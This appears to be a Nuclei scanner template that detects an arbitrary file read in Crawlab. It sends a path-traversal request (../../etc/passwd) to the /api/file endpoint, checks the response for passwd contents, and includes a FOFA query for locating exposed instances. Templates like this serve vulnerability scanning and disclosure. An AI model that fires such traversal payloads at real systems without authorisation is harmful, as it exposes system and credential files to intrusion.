id: crawlab-lfi

info:
  name: Crawlab - Arbitrary File Read
  author: pussycat0x
  severity: high
  description: Crawlab is vulnerable to arbitrary file read.
  reference:
    - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/Crawlab%20file%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: title="Crawlab"
  tags: crawlab,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/file?path=../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "data\":\""
          - "error\":"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450220534e3bbd01e45229b5a107a0e96ecbb9ab9737dd0693f0f9ceab490fc1f3530002210085f6beace1cf155e3e248255a70a872eb3bc138a23e726c0b731bc75ce9a9779:922c64590222798bb761d5b6d8e72950